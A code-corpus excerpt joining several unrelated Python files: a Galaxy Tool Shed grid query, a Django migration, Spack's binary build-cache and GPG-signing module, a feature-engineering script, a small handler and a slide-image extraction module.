visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
filter = trans.app.repository_grid_filter_manager.get_filter(trans)
if "id" in kwd:
# The user is browsing categories of valid repositories, so filter the request by the received id,
# which is a category id.
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
return (
trans.sa_session.query(model.Repository)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.join(model.RepositoryCategoryAssociation.table)
.join(model.Category.table)
.filter(
and_(
model.Category.table.c.id == trans.security.decode_id(kwd["id"]),
model.RepositoryMetadata.table.c.downloadable == true(),
)
)
)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.type == rt_util.REPOSITORY_SUITE_DEFINITION)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.join(model.RepositoryCategoryAssociation.table)
.join(model.Category.table)
.filter(
and_(
model.Category.table.c.id == trans.security.decode_id(kwd["id"]),
model.RepositoryMetadata.table.c.downloadable == true(),
)
)
)
else:
# The value of filter is None.
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.table.c.deleted == false(), model.Repository.table.c.deprecated == false()
)
)
.join(model.RepositoryMetadata.table)
.join(model.User.table)
.join(model.RepositoryCategoryAssociation.table)
.join(model.Category.table)
.filter(
and_(
model.Category.table.c.id == trans.security.decode_id(kwd["id"]),
model.RepositoryMetadata.table.c.downloadable == true(),
)
)
)
# The user performed a free text search on the ValidCategoryGrid.
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
return (
trans.sa_session.query(model.Repository)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
.filter(model.RepositoryMetadata.table.c.downloadable == true())
)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.type == rt_util.REPOSITORY_SUITE_DEFINITION)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
.filter(model.RepositoryMetadata.table.c.downloadable == true())
)
else:
# The value of filter is None.
return (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deleted == false(), model.Repository.table.c.deprecated == false())
)
.join(model.RepositoryMetadata.table)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
.filter(model.RepositoryMetadata.table.c.downloadable == true())
)
|
py | 7df8012753e5780d7063130084a86eaeddf41b8e | # Generated by Django 2.1.7 on 2019-04-11 04:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dashboard', '0005_auto_20190411_1038'),
]
operations = [
migrations.AlterField(
model_name='category',
name='category_status',
field=models.CharField(choices=[('', 'Select Status'), ('Active', 'Active'), ('Inactive', 'Inactive')], default='', max_length=10),
),
]
|
py | 7df8016f18e0c1257fe6b9c942b8087d8c59a557 | # Copyright 2013-2018 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
import re
import tarfile
import shutil
import platform
import tempfile
import hashlib
from contextlib import closing
import ruamel.yaml as yaml
import llnl.util.tty as tty
from llnl.util.filesystem import mkdirp, install_tree, get_filetype
import spack.cmd
import spack.fetch_strategy as fs
import spack.util.gpg as gpg_util
import spack.relocate as relocate
from spack.stage import Stage
from spack.util.gpg import Gpg
from spack.util.web import spider
from spack.util.executable import ProcessError
class NoOverwriteException(Exception):
"""
Raised when a file exists and must be overwritten.
"""
def __init__(self, file_path):
err_msg = "\n%s\nexists\n" % file_path
err_msg += "Use -f option to overwrite."
super(NoOverwriteException, self).__init__(err_msg)
class NoGpgException(spack.error.SpackError):
"""
Raised when gpg2 is not in PATH
"""
pass
class NoKeyException(spack.error.SpackError):
"""
Raised when gpg has no default key added.
"""
pass
class PickKeyException(spack.error.SpackError):
"""
Raised when multiple keys can be used to sign.
"""
def __init__(self, keys):
err_msg = "Multi keys available for signing\n%s\n" % keys
err_msg += "Use spack buildcache create -k <key hash> to pick a key."
super(PickKeyException, self).__init__(err_msg)
class NoVerifyException(spack.error.SpackError):
"""
Raised if file fails signature verification.
"""
pass
class NoChecksumException(spack.error.SpackError):
"""
Raised if file fails checksum verification.
"""
pass
class NewLayoutException(spack.error.SpackError):
"""
Raised if directory layout is different from buildcache.
"""
pass
def has_gnupg2():
try:
gpg_util.Gpg.gpg()('--version', output=os.devnull)
return True
except ProcessError:
return False
def buildinfo_file_name(prefix):
"""
Filename of the binary package meta-data file
"""
name = prefix + "/.spack/binary_distribution"
return name
def read_buildinfo_file(prefix):
"""
Read buildinfo file
"""
filename = buildinfo_file_name(prefix)
with open(filename, 'r') as inputfile:
content = inputfile.read()
buildinfo = yaml.load(content)
return buildinfo
def write_buildinfo_file(prefix, workdir, rel=False):
"""
Create a cache file containing information
required for the relocation
"""
text_to_relocate = []
binary_to_relocate = []
blacklist = (".spack", "man")
os_id = platform.system()
# Do this at during tarball creation to save time when tarball unpacked.
# Used by make_package_relative to determine binaries to change.
for root, dirs, files in os.walk(prefix, topdown=True):
dirs[:] = [d for d in dirs if d not in blacklist]
for filename in files:
path_name = os.path.join(root, filename)
# Check if the file contains a string with the installroot.
# This cuts down on the number of files added to the list
# of files potentially needing relocation
if relocate.strings_contains_installroot(
path_name, spack.store.layout.root):
filetype = get_filetype(path_name)
if relocate.needs_binary_relocation(filetype, os_id):
rel_path_name = os.path.relpath(path_name, prefix)
binary_to_relocate.append(rel_path_name)
elif relocate.needs_text_relocation(filetype):
rel_path_name = os.path.relpath(path_name, prefix)
text_to_relocate.append(rel_path_name)
# Create buildinfo data and write it to disk
buildinfo = {}
buildinfo['relative_rpaths'] = rel
buildinfo['buildpath'] = spack.store.layout.root
buildinfo['relative_prefix'] = os.path.relpath(
prefix, spack.store.layout.root)
buildinfo['relocate_textfiles'] = text_to_relocate
buildinfo['relocate_binaries'] = binary_to_relocate
filename = buildinfo_file_name(workdir)
with open(filename, 'w') as outfile:
outfile.write(yaml.dump(buildinfo, default_flow_style=True))
def tarball_directory_name(spec):
"""
Return name of the tarball directory according to the convention
<os>-<architecture>/<compiler>/<package>-<version>/
"""
return "%s/%s/%s-%s" % (spec.architecture,
str(spec.compiler).replace("@", "-"),
spec.name, spec.version)
def tarball_name(spec, ext):
"""
Return the name of the tarfile according to the convention
<os>-<architecture>-<package>-<dag_hash><ext>
"""
return "%s-%s-%s-%s-%s%s" % (spec.architecture,
str(spec.compiler).replace("@", "-"),
spec.name,
spec.version,
spec.dag_hash(),
ext)
def tarball_path_name(spec, ext):
"""
Return the full path+name for a given spec according to the convention
<tarball_directory_name>/<tarball_name>
"""
return os.path.join(tarball_directory_name(spec),
tarball_name(spec, ext))
def checksum_tarball(file):
# calculate sha256 hash of tar file
block_size = 65536
hasher = hashlib.sha256()
with open(file, 'rb') as tfile:
buf = tfile.read(block_size)
while len(buf) > 0:
hasher.update(buf)
buf = tfile.read(block_size)
return hasher.hexdigest()
def sign_tarball(key, force, specfile_path):
# Sign the packages if keys available
if not has_gnupg2():
raise NoGpgException(
"gpg2 is not available in $PATH .\n"
"Use spack install gnupg and spack load gnupg.")
else:
if key is None:
keys = Gpg.signing_keys()
if len(keys) == 1:
key = keys[0]
if len(keys) > 1:
raise PickKeyException(str(keys))
if len(keys) == 0:
msg = "No default key available for signing.\n"
msg += "Use spack gpg init and spack gpg create"
msg += " to create a default key."
raise NoKeyException(msg)
if os.path.exists('%s.asc' % specfile_path):
if force:
os.remove('%s.asc' % specfile_path)
else:
raise NoOverwriteException('%s.asc' % specfile_path)
Gpg.sign(key, specfile_path, '%s.asc' % specfile_path)
def generate_index(outdir, indexfile_path):
f = open(indexfile_path, 'w')
header = """<html>\n
<head>\n</head>\n
<list>\n"""
footer = "</list>\n</html>\n"
paths = os.listdir(outdir + '/build_cache')
f.write(header)
for path in paths:
rel = os.path.basename(path)
f.write('<li><a href="%s"> %s</a>\n' % (rel, rel))
f.write(footer)
f.close()
def build_tarball(spec, outdir, force=False, rel=False, unsigned=False,
allow_root=False, key=None):
"""
Build a tarball from given spec and put it into the directory structure
used at the mirror (following <tarball_directory_name>).
"""
# set up some paths
tarfile_name = tarball_name(spec, '.tar.gz')
tarfile_dir = os.path.join(outdir, "build_cache",
tarball_directory_name(spec))
tarfile_path = os.path.join(tarfile_dir, tarfile_name)
mkdirp(tarfile_dir)
spackfile_path = os.path.join(
outdir, "build_cache", tarball_path_name(spec, '.spack'))
if os.path.exists(spackfile_path):
if force:
os.remove(spackfile_path)
else:
raise NoOverwriteException(str(spackfile_path))
# need to copy the spec file so the build cache can be downloaded
# without concretizing with the current spack packages
# and preferences
spec_file = os.path.join(spec.prefix, ".spack", "spec.yaml")
specfile_name = tarball_name(spec, '.spec.yaml')
specfile_path = os.path.realpath(
os.path.join(outdir, "build_cache", specfile_name))
indexfile_path = os.path.join(outdir, "build_cache", "index.html")
if os.path.exists(specfile_path):
if force:
os.remove(specfile_path)
else:
raise NoOverwriteException(str(specfile_path))
# make a copy of the install directory to work with
workdir = os.path.join(tempfile.mkdtemp(), os.path.basename(spec.prefix))
install_tree(spec.prefix, workdir, symlinks=True)
# create info for later relocation and create tar
write_buildinfo_file(spec.prefix, workdir, rel=rel)
# optinally make the paths in the binaries relative to each other
# in the spack install tree before creating tarball
if rel:
try:
make_package_relative(workdir, spec.prefix, allow_root)
except Exception as e:
shutil.rmtree(workdir)
shutil.rmtree(tarfile_dir)
tty.die(str(e))
else:
try:
make_package_placeholder(workdir, allow_root)
except Exception as e:
shutil.rmtree(workdir)
shutil.rmtree(tarfile_dir)
tty.die(str(e))
# create compressed tarball of the install prefix
with closing(tarfile.open(tarfile_path, 'w:gz')) as tar:
tar.add(name='%s' % workdir,
arcname='%s' % os.path.basename(spec.prefix))
# remove copy of install directory
shutil.rmtree(workdir)
# get the sha256 checksum of the tarball
checksum = checksum_tarball(tarfile_path)
# add sha256 checksum to spec.yaml
spec_dict = {}
with open(spec_file, 'r') as inputfile:
content = inputfile.read()
spec_dict = yaml.load(content)
bchecksum = {}
bchecksum['hash_algorithm'] = 'sha256'
bchecksum['hash'] = checksum
spec_dict['binary_cache_checksum'] = bchecksum
# Add original install prefix relative to layout root to spec.yaml.
# This will be used to determine is the directory layout has changed.
buildinfo = {}
buildinfo['relative_prefix'] = os.path.relpath(
spec.prefix, spack.store.layout.root)
spec_dict['buildinfo'] = buildinfo
with open(specfile_path, 'w') as outfile:
outfile.write(yaml.dump(spec_dict))
# sign the tarball and spec file with gpg
if not unsigned:
sign_tarball(key, force, specfile_path)
# put tarball, spec and signature files in .spack archive
with closing(tarfile.open(spackfile_path, 'w')) as tar:
tar.add(name='%s' % tarfile_path, arcname='%s' % tarfile_name)
tar.add(name='%s' % specfile_path, arcname='%s' % specfile_name)
if not unsigned:
tar.add(name='%s.asc' % specfile_path,
arcname='%s.asc' % specfile_name)
# cleanup file moved to archive
os.remove(tarfile_path)
if not unsigned:
os.remove('%s.asc' % specfile_path)
# create an index.html for the build_cache directory so specs can be found
if os.path.exists(indexfile_path):
os.remove(indexfile_path)
generate_index(outdir, indexfile_path)
return None
def download_tarball(spec):
"""
Download binary tarball for given package into stage area
Return True if successful
"""
mirrors = spack.config.get('mirrors')
if len(mirrors) == 0:
tty.die("Please add a spack mirror to allow " +
"download of pre-compiled packages.")
tarball = tarball_path_name(spec, '.spack')
for key in mirrors:
url = mirrors[key] + "/build_cache/" + tarball
# stage the tarball into standard place
stage = Stage(url, name="build_cache", keep=True)
try:
stage.fetch()
return stage.save_filename
except fs.FetchError:
continue
return None
def make_package_relative(workdir, prefix, allow_root):
"""
Change paths in binaries to relative paths
"""
buildinfo = read_buildinfo_file(workdir)
old_path = buildinfo['buildpath']
orig_path_names = list()
cur_path_names = list()
for filename in buildinfo['relocate_binaries']:
orig_path_names.append(os.path.join(prefix, filename))
cur_path_names.append(os.path.join(workdir, filename))
relocate.make_binary_relative(cur_path_names, orig_path_names,
old_path, allow_root)
def make_package_placeholder(workdir, allow_root):
"""
Change paths in binaries to placeholder paths
"""
buildinfo = read_buildinfo_file(workdir)
cur_path_names = list()
for filename in buildinfo['relocate_binaries']:
cur_path_names.append(os.path.join(workdir, filename))
relocate.make_binary_placeholder(cur_path_names, allow_root)
def relocate_package(workdir, allow_root):
"""
Relocate the given package
"""
buildinfo = read_buildinfo_file(workdir)
new_path = spack.store.layout.root
old_path = buildinfo['buildpath']
rel = buildinfo.get('relative_rpaths', False)
if rel:
return
tty.msg("Relocating package from",
"%s to %s." % (old_path, new_path))
path_names = set()
for filename in buildinfo['relocate_textfiles']:
path_name = os.path.join(workdir, filename)
# Don't add backup files generated by filter_file during install step.
if not path_name.endswith('~'):
path_names.add(path_name)
relocate.relocate_text(path_names, old_path, new_path)
# If the binary files in the package were not edited to use
# relative RPATHs, then the RPATHs need to be relocated
if not rel:
path_names = set()
for filename in buildinfo['relocate_binaries']:
path_name = os.path.join(workdir, filename)
path_names.add(path_name)
relocate.relocate_binary(path_names, old_path, new_path,
allow_root)
def extract_tarball(spec, filename, allow_root=False, unsigned=False,
force=False):
"""
extract binary tarball for given package into install area
"""
if os.path.exists(spec.prefix):
if force:
shutil.rmtree(spec.prefix)
else:
raise NoOverwriteException(str(spec.prefix))
tmpdir = tempfile.mkdtemp()
stagepath = os.path.dirname(filename)
spackfile_name = tarball_name(spec, '.spack')
spackfile_path = os.path.join(stagepath, spackfile_name)
tarfile_name = tarball_name(spec, '.tar.gz')
tarfile_path = os.path.join(tmpdir, tarfile_name)
specfile_name = tarball_name(spec, '.spec.yaml')
specfile_path = os.path.join(tmpdir, specfile_name)
with closing(tarfile.open(spackfile_path, 'r')) as tar:
tar.extractall(tmpdir)
if not unsigned:
if os.path.exists('%s.asc' % specfile_path):
try:
Gpg.verify('%s.asc' % specfile_path, specfile_path)
except Exception as e:
shutil.rmtree(tmpdir)
tty.die(str(e))
else:
shutil.rmtree(tmpdir)
raise NoVerifyException(
"Package spec file failed signature verification.\n"
"Use spack buildcache keys to download "
"and install a key for verification from the mirror.")
# get the sha256 checksum of the tarball
checksum = checksum_tarball(tarfile_path)
# get the sha256 checksum recorded at creation
spec_dict = {}
with open(specfile_path, 'r') as inputfile:
content = inputfile.read()
spec_dict = yaml.load(content)
bchecksum = spec_dict['binary_cache_checksum']
# if the checksums don't match don't install
if bchecksum['hash'] != checksum:
shutil.rmtree(tmpdir)
raise NoChecksumException(
"Package tarball failed checksum verification.\n"
"It cannot be installed.")
new_relative_prefix = str(os.path.relpath(spec.prefix,
spack.store.layout.root))
# if the original relative prefix is in the spec file use it
buildinfo = spec_dict.get('buildinfo', {})
old_relative_prefix = buildinfo.get('relative_prefix', new_relative_prefix)
# if the original relative prefix and new relative prefix differ the
# directory layout has changed and the buildcache cannot be installed
if old_relative_prefix != new_relative_prefix:
shutil.rmtree(tmpdir)
msg = "Package tarball was created from an install "
msg += "prefix with a different directory layout.\n"
msg += "It cannot be relocated."
raise NewLayoutException(msg)
# extract the tarball in a temp directory
with closing(tarfile.open(tarfile_path, 'r')) as tar:
tar.extractall(path=tmpdir)
# the base of the install prefix is used when creating the tarball
# so the pathname should be the same now that the directory layout
# is confirmed
workdir = os.path.join(tmpdir, os.path.basename(spec.prefix))
# cleanup
os.remove(tarfile_path)
os.remove(specfile_path)
try:
relocate_package(workdir, allow_root)
except Exception as e:
shutil.rmtree(workdir)
tty.die(str(e))
# Delay creating spec.prefix until verification is complete
# and any relocation has been done.
else:
install_tree(workdir, spec.prefix, symlinks=True)
finally:
shutil.rmtree(tmpdir)
#: Internal cache for get_specs
_cached_specs = None
def get_specs(force=False):
"""
Get spec.yaml's for build caches available on mirror
"""
global _cached_specs
if _cached_specs:
tty.debug("Using previously-retrieved specs")
return _cached_specs
mirrors = spack.config.get('mirrors')
if len(mirrors) == 0:
tty.warn("No Spack mirrors are currently configured")
return {}
path = str(spack.architecture.sys_type())
urls = set()
for key in mirrors:
url = mirrors[key]
if url.startswith('file'):
mirror = url.replace('file://', '') + '/build_cache'
tty.msg("Finding buildcaches in %s" % mirror)
files = os.listdir(mirror)
for file in files:
if re.search('spec.yaml', file):
link = 'file://' + mirror + '/' + file
urls.add(link)
else:
tty.msg("Finding buildcaches on %s" % url)
p, links = spider(url + "/build_cache")
for link in links:
if re.search("spec.yaml", link) and re.search(path, link):
urls.add(link)
_cached_specs = set()
for link in urls:
with Stage(link, name="build_cache", keep=True) as stage:
if force and os.path.exists(stage.save_filename):
os.remove(stage.save_filename)
if not os.path.exists(stage.save_filename):
try:
stage.fetch()
except fs.FetchError:
continue
with open(stage.save_filename, 'r') as f:
# read the spec from the build cache file. All specs
# in build caches are concrete (as they are built) so
# we need to mark this spec concrete on read-in.
spec = spack.spec.Spec.from_yaml(f)
spec._mark_concrete()
_cached_specs.add(spec)
return _cached_specs
def get_keys(install=False, trust=False, force=False):
"""
Get pgp public keys available on mirror
"""
mirrors = spack.config.get('mirrors')
if len(mirrors) == 0:
tty.die("Please add a spack mirror to allow " +
"download of build caches.")
keys = set()
for key in mirrors:
url = mirrors[key]
if url.startswith('file'):
mirror = url.replace('file://', '') + '/build_cache'
tty.msg("Finding public keys in %s" % mirror)
files = os.listdir(mirror)
for file in files:
if re.search('\.key', file):
link = 'file://' + mirror + '/' + file
keys.add(link)
else:
tty.msg("Finding public keys on %s" % url)
p, links = spider(url + "/build_cache", depth=1)
for link in links:
if re.search("\.key", link):
keys.add(link)
for link in keys:
with Stage(link, name="build_cache", keep=True) as stage:
if os.path.exists(stage.save_filename) and force:
os.remove(stage.save_filename)
if not os.path.exists(stage.save_filename):
try:
stage.fetch()
except fs.FetchError:
continue
tty.msg('Found key %s' % link)
if install:
if trust:
Gpg.trust(stage.save_filename)
tty.msg('Added this key to trusted keys.')
else:
tty.msg('Will not add this key to trusted keys.'
'Use -t to install all downloaded keys')
|
py | 7df802052945cfb0d080bfa80cbf0b75ef837feb | #!/home/sunnymarkliu/softwares/anaconda3/bin/python
# _*_ coding: utf-8 _*_
"""
@author: SunnyMarkLiu
@time : 17-12-22 下午5:30
"""
from __future__ import absolute_import, division, print_function
import os
import sys
import cPickle
module_path = os.path.abspath(os.path.join('..'))
sys.path.append(module_path)
# remove warnings
import warnings
warnings.filterwarnings('ignore')
import numpy as np
import pandas as pd
from conf.configure import Configure
from utils import data_utils
def discretize_features(train, test):
""" 连续特征离散化 """
test['orderType'] = np.array([0] * test.shape[0])
conbined_data = pd.concat([train, test])
# basic_user_action_features
numerical_features = ['browse_product_ratio', 'browse_product2_ratio', 'browse_product3_ratio', 'fillin_form5_ratio', 'fillin_form6_ratio',
'fillin_form7_ratio', 'open_app_ratio', 'pay_money_ratio', 'submit_order_ratio', 'open_app_pay_money_ratio',
'browse_product_pay_money_ratio', 'browse_product2_pay_money_ratio', 'browse_product3_pay_money_ratio',
'fillin_form5_pay_money_ratio', 'fillin_form6_pay_money_ratio', 'fillin_form7_pay_money_ratio','submit_order_pay_money_ratio']
for feature in numerical_features:
conbined_data[feature] = pd.cut(conbined_data[feature].values, bins=int(len(set(conbined_data[feature])) * 0.6)).codes
train = conbined_data.iloc[:train.shape[0], :]
test = conbined_data.iloc[train.shape[0]:, :]
del test['orderType']
return train, test
def feature_interaction(train, test):
""" 特征交叉等操作 """
test['orderType'] = np.array([0] * test.shape[0])
conbined_data = pd.concat([train, test])
print('一些类别特征进行 one-hot')
# basic_user_info, bad!
# dummies = pd.get_dummies(conbined_data['province_code'], prefix='province_code')
# conbined_data[dummies.columns] = dummies
# del conbined_data['province_code']
# # basic_user_action_features, bad!
# dummies = pd.get_dummies(conbined_data['most_free_month'], prefix='most_free_month')
# conbined_data[dummies.columns] = dummies
# del conbined_data['most_free_month']
# user_order_history_features,improve cv a little
# dum_features = ['last_time_continent', 'last_time_country', 'last_time_city']
# for f in dum_features:
# dummies = pd.get_dummies(conbined_data[f], prefix=f)
# conbined_data[dummies.columns] = dummies
# del conbined_data[f]
print('特征组合')
# conbined_data['has_good_order_x_country_rich'] = conbined_data['has_good_order'] * conbined_data['country_rich']
train = conbined_data.iloc[:train.shape[0], :]
test = conbined_data.iloc[train.shape[0]:, :]
del test['orderType']
return train, test
def load_train_test():
# 待预测订单的数据 (原始训练集和测试集)
train = pd.read_csv(Configure.base_path + 'train/orderFuture_train.csv', encoding='utf8')
test = pd.read_csv(Configure.base_path + 'test/orderFuture_test.csv', encoding='utf8')
# 加载特征, 并合并
features_merged_dict = Configure.features
for feature_name in Configure.features:
print('pd merge', feature_name)
train_feature, test_feature = data_utils.load_features(feature_name)
train = pd.merge(train, train_feature,
on=features_merged_dict[feature_name]['on'],
how=features_merged_dict[feature_name]['how'])
test = pd.merge(test, test_feature,
on=features_merged_dict[feature_name]['on'],
how=features_merged_dict[feature_name]['how'])
# # 过采样处理样本不均衡
# pos_train = train[train['orderType'] == 1]
# neg_train = train[train['orderType'] == 0]
# print('train, ordertype1: ', pos_train.shape[0], ', ordertype0: ', neg_train.shape[0], ', 1:0 = ', 1.0 * pos_train.shape[0] / neg_train.shape[0])
#
# sample_pos_size = int(pos_train.shape[0] * 0.05)
# sample_pos_train = pos_train.sample(sample_pos_size, random_state=42)
# train = pd.concat([neg_train, pos_train, sample_pos_train])
# pos_train = train[train['orderType'] == 1]
# print('train, ordertype1: ', pos_train.shape[0], ', ordertype0: ', neg_train.shape[0], ', 1:0 = ', 1.0 * pos_train.shape[0] / neg_train.shape[0])
train.drop(['gender', 'province', 'age', 'has_history_flag'], axis=1, inplace=True)
test.drop(['gender', 'province', 'age', 'has_history_flag'], axis=1, inplace=True)
# # 去掉 importance 很低的特征
# droped_features = ['user_rating_std']
# train.drop(droped_features, axis=1, inplace=True)
# test.drop(droped_features, axis=1, inplace=True)
print('特征组合')
train, test = feature_interaction(train, test)
print('连续特征离散化')
train, test = discretize_features(train, test)
return train, test
def load_571_all_feature_datasets():
with open('all_571_features_train.pkl', "rb") as f:
train = cPickle.load(f)
with open('all_571_features_test.pkl', "rb") as f:
test = cPickle.load(f)
return train, test
def load_0_97210_datasets():
with open('train_0.97210.pkl', "rb") as f:
train = cPickle.load(f)
with open('test_0.97210.pkl', "rb") as f:
test = cPickle.load(f)
return train, test
def load_datasets():
print('load baseline features')
train, test = load_0_97210_datasets()
# 这些特征 和 性能更好的 history_order_type_sum_lg0 存在共线性
# train.drop(['2016_2017_first_last_ordertype'], axis=1, inplace=True)
# test.drop(['2016_2017_first_last_ordertype'], axis=1, inplace=True)
# 加载特征, 并合并
features_merged_dict = Configure.new_features
for feature_name in features_merged_dict:
print('merge', feature_name)
train_feature, test_feature = data_utils.load_features(feature_name)
train = pd.merge(train, train_feature,
on=features_merged_dict[feature_name]['on'],
how=features_merged_dict[feature_name]['how'])
test = pd.merge(test, test_feature,
on=features_merged_dict[feature_name]['on'],
how=features_merged_dict[feature_name]['how'])
# # 按照规则,讲测试集中的类别为1的测试数据添加到训练集中,线上爆炸!
# sample_pos_test = test[test['history_order_type_sum_lg0'] == 1]
# sample_pos_test['orderType'] = 1
# train = pd.concat([train, sample_pos_test], axis=0)
train.drop(['history_order_type_sum_lg0'], axis=1, inplace=True)
test.drop(['history_order_type_sum_lg0'], axis=1, inplace=True)
# train, test = remove_some_features(train, test)
# with open('train_0.97329.pkl', "wb") as f:
# cPickle.dump(train, f, -1)
# with open('test_0.97329.pkl', "wb") as f:
# cPickle.dump(test, f, -1)
#
return train, test
def remove_some_features(train, test):
features_weights = pd.read_csv('0.97329_xgb_features_weights.csv')
removed_features = features_weights[features_weights['weights'] == 0]['feature'].values
train.drop(removed_features, axis=1, inplace=True)
test.drop(removed_features, axis=1, inplace=True)
return train, test
|
py | 7df802e23d90f465f24496f7bb78fa7fd9bdcfae | from bnw.handlers.base import require_auth
@require_auth
def cmd_whoami(request):
return dict(ok=True, user=request.user['name'])
|
py | 7df80347e82cb0a9bdadced4098a7c5ca1c3e436 | import json
import logging
from functools import reduce
from os.path import join
from typing import Tuple, Iterator, List, Dict, Any
import numpy
import openslide
import pandas
from pandas import DataFrame
from antilles.block import Field, Step, Block
from antilles.pipeline.annotate import annotate_slides
from antilles.project import Project
from antilles.utils.image import get_mpp_from_openslide
from antilles.utils.io import DAO
from antilles.utils.math import pol2cart
def calc_bbox(
dims: Tuple[int, int], center: Tuple[int, int], angle: float, **kwargs
) -> Tuple[Tuple[int, int], Tuple[int, int]]:
width, height = dims
c_x, c_y = center
span = kwargs.get("span", 90.0)
radius_inner = kwargs.get("radius_inner", 400)
radius_outer = kwargs.get("radius_outer", 800)
n_divisions = 200
n_div0 = int(n_divisions * float(span) / 360.0)
n_div1 = n_divisions - n_div0
hspan = span / 2.0
angles0 = numpy.linspace(angle - hspan, angle + hspan, n_div0)
angles1 = numpy.linspace(angle + hspan, angle + 360 - hspan, n_div1)
min_dx, max_dx = None, None
min_dy, max_dy = None, None
for r, angles in zip([radius_outer, radius_inner], [angles0, angles1]):
for a in angles:
dx, dy = pol2cart(r, a)
if min_dx is None:
min_dx = dx
if max_dx is None:
max_dx = dx
if min_dy is None:
min_dy = dy
if max_dy is None:
max_dy = dy
min_dx, max_dx = min(min_dx, dx), max(max_dx, dx)
min_dy, max_dy = min(min_dy, dy), max(max_dy, dy)
min_x = int(max(c_x + min_dx, 0))
max_x = int(min(c_x + max_dx, width))
dx = max_x - min_x
min_y = int(max(c_y + min_dy, 0))
max_y = int(min(c_y + max_dy, height))
dy = max_y - min_y
return (min_x, min_y), (dx, dy)
def get_extraction_sequence(settings: Dict[str, Any]) -> Iterator[Dict[str, Any]]:
for key in ["samples", "devices", "coords", "angles"]:
if key not in settings.keys():
raise ValueError(f"Key not found: {key}")
regions = settings["coords"].to_dict("records")
sample_angles = settings["angles"].to_dict("records")
sample_angles = {s["sample"]: float(s["angle"]) for s in sample_angles}
for region in regions:
# get wells from payload
device_name = next(
s["device"] for s in settings["samples"] if s["name"] == region["sample"]
)
payload = next(
d["payload"] for d in settings["devices"] if d["name"] == device_name
)
wells = next(l["wells"] for l in payload if l["level"] == region["level"])
src = region["relpath"]
for well in wells:
fields = {
"project": region["project"],
"block": region["block"],
"panel": region["panel"],
"level": region["level"],
"sample": region["sample"],
"cohorts": region["cohorts"],
"drug": well["drug"],
}
params = {
"center": (int(region["center_x"]), int(region["center_y"])),
"angle": sample_angles[region["sample"]] + well["angle"],
}
yield {"src": src, "fields": fields, "params": params}
def microns2pixels(dct: Dict[str, Any], keys: List[str], mpp: float):
for key in keys:
try:
dct[key] /= mpp
except TypeError:
pass
return dct
def get_filepath(step: Step, fields: Dict[str, Any], output_order: List[str]) -> str:
for key in ["project", "block", "panel", "level", "sample", "drug"]:
if key not in fields.keys():
raise ValueError(f"Key not found: {key}")
fields["level"] = "LVL" + str(fields["level"])
dirpath = join(fields["project"], fields["block"], step.value)
dirpath = join(dirpath, *(fields[o] for o in output_order))
DAO.make_dir(dirpath)
filename_order = ["project", "block", "panel", "level", "sample", "drug"]
filename = "_".join(fields[f] for f in filename_order) + ".tif"
filepath = join(dirpath, filename)
fields["level"] = int(fields["level"][len("LVL") :])
return filepath
def extract_image(src: str, dst: str, params: Dict[str, Any]) -> Dict[str, Any]:
with openslide.OpenSlide(DAO.abs(src)) as obj:
dims = obj.dimensions
mpp = get_mpp_from_openslide(obj)
params = microns2pixels(params, ["radius_inner", "radius_outer"], mpp)
origin, size = calc_bbox(dims=dims, **params)
image = obj.read_region(origin, 0, size)
image = image.convert("RGB")
image.save(DAO.abs(dst))
cx = params["center"][0] - origin[0]
cy = params["center"][1] - origin[1]
r_init = 400 / mpp
dx, dy = pol2cart(r_init, params["angle"])
wx, wy = int(round(cx + dx)), int(round(cy + dy))
return {"oxy": origin, "cxy": (cx, cy), "wxy": (wx, wy), "dims": size, "mpp": mpp}
def update_translate(df: DataFrame, using: DataFrame):
buffer = 5
cols = ["project", "block", "panel", "level", "sample", "drug"]
for i, row in df.iterrows():
ind = (row[col] == using[col] for col in cols)
ind = reduce((lambda x, y: x & y), ind)
using_row = using[ind]
if len(using_row) == 1:
oxy_old = using_row["origin_x"].values[0], using_row["origin_y"].values[0]
cxy_old = using_row["center_x"].values[0], using_row["center_y"].values[0]
wxy_old = using_row["well_x"].values[0], using_row["well_y"].values[0]
oxy_new = row["origin_x"], row["origin_y"]
diff_x = oxy_new[0] - oxy_old[0]
diff_y = oxy_new[1] - oxy_old[1]
cxy_new = cxy_old[0] - diff_x, cxy_old[1] - diff_y
wxy_new = wxy_old[0] - diff_x, wxy_old[1] - diff_y
cxy_new = max(cxy_new[0], buffer), max(cxy_new[1], buffer)
wxy_new = max(wxy_new[0], buffer), max(wxy_new[1], buffer)
df.loc[i, ["center_x"]] = cxy_new[0]
df.loc[i, ["center_y"]] = cxy_new[1]
df.loc[i, ["well_x"]] = wxy_new[0]
df.loc[i, ["well_y"]] = wxy_new[1]
df.loc[i, ["metadata"]] = using_row["metadata"].values[0]
return df
class Extractor:
def __init__(self, project: Project, block: Block):
self.log = logging.getLogger(__name__)
self.project = project
self.block = block
def adjust(self):
coords = self.block.get(Field.IMAGES_COORDS)
angles = self.block.get(Field.ANGLES_COARSE)
annotate_slides(coords, angles)
self.block.save(coords, Field.IMAGES_COORDS)
self.block.save(angles, Field.ANGLES_COARSE)
